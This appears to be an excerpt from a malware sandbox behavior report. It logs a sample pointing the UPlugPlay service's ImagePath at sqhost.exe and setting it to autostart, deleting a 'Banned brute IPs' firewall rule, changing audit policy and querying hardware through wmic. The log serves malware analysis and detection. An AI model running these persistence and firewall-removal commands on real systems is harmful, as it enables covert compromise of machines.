Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs' | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs' | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable | Jump to behavior |